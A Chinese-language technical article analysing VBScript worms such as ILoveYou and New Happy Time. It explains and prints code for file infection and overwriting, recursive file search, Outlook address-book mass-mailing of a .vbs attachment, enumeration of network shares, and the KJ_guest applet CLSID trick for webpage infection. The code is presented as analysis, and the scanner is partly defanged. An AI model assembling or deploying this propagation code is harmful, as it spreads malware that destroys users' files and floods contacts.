網絡的流行,讓我們的世界變得更加美好,但它也有讓人不愉快的時候。當您收到一封主題為“I Love You”的郵件,用興奮得幾乎快發抖的鼠標去點擊附件的時候;當您瀏覽一個信任的網站之后,發現打開每個文件夾的速度非常慢的時候,您是否察覺病毒已經闖進了您的世界呢?2000年5月4日歐美爆發的“愛蟲”網絡蠕蟲病毒。由于通過電子郵件系統傳播,愛蟲病毒在短短幾天內狂襲全球數百萬計的電腦。微軟、Intel等在內的眾多大型企業網絡系統癱瘓,全球經濟損失達幾十億美元。而去年爆發的新歡樂時光病毒至今都讓廣大電腦用戶更是苦不堪言。 上面提及的兩個病毒最大的一個共同特點是:使用VBScript編寫。以愛蟲和新歡樂時光病毒為典型代表的VBS腳本病毒十分的猖獗,很重要的一個原因就是其編寫簡單。下面我們就來逐一對VBS腳本病毒的各個方面加以分析:
二、Vbs腳本病毒原理分析 1.vbs腳本病毒如何感染、搜索文件 VBS腳本病毒一般是直接通過自我復制來感染文件的,病毒中的絕大部分代碼都可以直接附加在其他同類程序的中間,譬如新歡樂時光病毒可以將自己的代碼附加在.htm文件的尾部,并在頂部加入一條調用病毒代碼的語句,而愛蟲病毒則是直接生成一個文件的副本,將病毒代碼拷入其中,并以原文件名作為病毒文件名的前綴,vbs作為后綴。下面我們通過愛蟲病毒的部分代碼具體分析一下這類病毒的感染和搜索原理: 以下是文件感染的部分關鍵代碼: Set fso=createobject("scripting.filesystemobject") '創建一個文件系統對象 set self=fso.opentextfile(wscript.scriptfullname,1) '讀打開當前文件(即病毒本身) vbscopy=self.readall ' 讀取病毒全部代碼到字符串變量vbscopy…… set ap=fso.opentextfile(目標文件.path,2,true) ' 寫打開目標文件,準備寫入病毒代碼 ap.write vbscopy ' 將病毒代碼覆蓋目標文件 ap.close set cop=fso.getfile(目標文件.path) '得到目標文件路徑 cop.copy(目標文件.path ".vbs") ' 創建另外一個病毒文件(以.vbs為后綴) 目標文件.delete(true) '刪除目標文件 上面描述了病毒文件是如何感染正常文件的:首先將病毒自身代碼賦給字符串變量vbscopy,然后將這個字符串覆蓋寫到目標文件,并創建一個以目標文件名為文件名前綴、vbs為后綴的文件副本,最后刪除目標文件。 下面我們具體分析一下文件搜索代碼: '該函數主要用來尋找滿足條件的文件,并生成對應文件的一個病毒副本 sub scan(folder_) 'scan函數定義, on error resume next '如果出現錯誤,直接跳過,防止彈出錯誤窗口 set folder_=fso.getfolder(folder_) set files=folder_.files ' 當前目錄的所有文件集合 for each file in filesext=fso.GetExtensionName(file) '獲取文件后綴 ext=lcase(ext) '后綴名轉換成小寫字母 if ext="mp5" then '如果后綴名是mp5,則進行感染。請自己建立相應后綴名的文件,最好是非正常后綴名 ,以免破壞正常程序。 Wscript.echo (file) end if next set subfolders=folder_.subfolders for each subfolder in subfolders '搜索其他目錄;遞歸調用 scan( ) scan(subfolder) next end sub 上面的代碼就是VBS腳本病毒進行文件搜索的代碼分析。搜索部分scan( )函數做得比較短小精悍,非常巧妙,采用了一個遞歸的算法遍歷整個分區的目錄和文件。
2.vbs腳本病毒通過網絡傳播的幾種方式及代碼分析 VBS腳本病毒之所以傳播范圍廣,主要依賴于它的網絡傳播功能,一般來說,VBS腳本病毒采用如下幾種方式進行傳播: 1)通過Email附件傳播 這是一種用的非常普遍的傳播方式,病毒可以通過各種方法拿到合法的Email地址,最常見的就是直接取outlook地址簿中的郵件地址,也可以通過程序在用戶文檔(譬如htm文件)中搜索Email地址。 下面我們具體分析一下VBS腳本病毒是如何做到這一點的: Function mailBroadcast() on error resume next wscript.echo Set outlookApp = CreateObject("Outlook.Application") //創建一個OUTLOOK應用的對象 If outlookApp= "Outlook" Then Set mapiObj=outlookApp.GetNameSpace("MAPI") //獲取MAPI的名字空間 Set addrList= mapiObj.AddressLists //獲取地址表的個數 For Each addr In addrList If addr.AddressEntries.Count > 0 Then addrEntCount = addr.AddressEntries.Count //獲取每個地址表的Email記錄數 For addrEntIndex= 1 To addrEntCount //遍歷地址表的Email地址 Set item = outlookApp.CreateItem(0) //獲取一個郵件對象實例 Set addrEnt = addr.AddressEntries(addrEntIndex) //獲取具體Email地址 item.To = addrEnt.Address //填入收信人地址 item.Subject = "病毒傳播實驗" //寫入郵件標題 item.Body = "這里是病毒郵件傳播測試,收到此信請不要慌張!" //寫入文件內容 Set attachMents=item.Attachments //定義郵件附件 attachMents.Add fileSysObj.GetSpecialFolder(0) "\test.jpg.vbs" item.DeleteAfterSubmit = True //信件提交后自動刪除 If item.To > "" Then item.Send //發送郵件 shellObj.regwrite "HKCU\software\Mailtest\mailed", "1" //病毒標記,以免重復感染 End If Next End If Next End if End Function
2)通過局域網共享傳播 局域網共享傳播也是一種非常普遍并且有效的網絡傳播方式。一般來說,為了局域網內交流方便,一定存在不少共享目錄,并且具有可寫權限,譬如win2000創建共享時,默認就是具有可寫權限。這樣病毒通過搜索這些共享目錄,就可以將病毒代碼傳播到這些目錄之中。 在VBS中,有一個對象可以實現網上鄰居共享文件夾的搜索與文件操作。我們利用該對象就可以達到傳播的目的。 welcome_msg = "網絡連接搜索測試" Set WSHNetwork = WScript.CreateObject("WScript.Network") '創建一個網絡對象 Set oPrinters = WshNetwork.EnumPrinterConnections '創建一個網絡打印機連接列表 WScript.Echo "Network printer mappings:" For i = 0 to oPrinters.Count - 1 Step 2 '顯示網絡打印機連接情況 WScript.Echo "Port " oPrinters.Item(i) " = " oPrinters.Item(i+1) Next Set colDrives = WSHNetwork.EnumNetworkDrives '創建一個網絡共享連接列表 If colDrives.Count = 0 Then MsgBox "沒有可列出的驅動器。", vbInformation + vbOkOnly,welcome_msg Else strMsg = "當前網絡驅動器連接: " CRLF For i = 0 To colDrives.Count - 1 Step 2 strMsg = strMsg Chr(13) Chr(10) colDrives(i) Chr(9) colDrives(i + 1) Next MsgBox strMsg, vbInformation + vbOkOnly, welcome_msg'顯示當前網絡驅動器連接 End If 上面是一個用來尋找當前打印機連接和網絡共享連接并將它們顯示出來的完整腳本程序。在知道了共享連接之后,我們就可以直接向目標驅動器讀寫文件了。
3)通過感染htm、asp、jsp、php等網頁文件傳播 如今,WWW服務已經變得非常普遍,病毒通過感染htm等文件,勢必會導致所有訪問過該網頁的用戶機器感染病毒。 病毒之所以能夠在htm文件中發揮強大功能,采用了和絕大部分網頁惡意代碼相同的原理。基本上,它們采用了相同的代碼,不過也可以采用其它代碼,這段代碼是病毒FSO,WSH等對象能夠在網頁中運行的關鍵。在注冊表HKEY_CLASSES_ROOT\CLSID\下我們可以找到這么一個主鍵{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B},注冊表中對它他的說明是“Windows Script Host Shell Object”,同樣,我們也可以找到{0D43FE01-F093-11CF-8940-00A0C9054228},注冊表對它的說明是“FileSystem Object”,一般先要對COM進行初始化,在獲取相應的組件對象之后,病毒便可正確地使用FSO、WSH兩個對象,調用它們的強大功能。代碼如下所示: Set Apple0bject = document.applets("KJ_guest") Apple0bject.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}") Apple0bject.createInstance() '創建一個實例 Set WsShell Apple0bject.Get0bject() Apple0bject.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}") Apple0bject.createInstance() '創建一個實例 Set FSO = Apple0bject.Get0bject() 對于其他類型文件,這里不再一一分析。
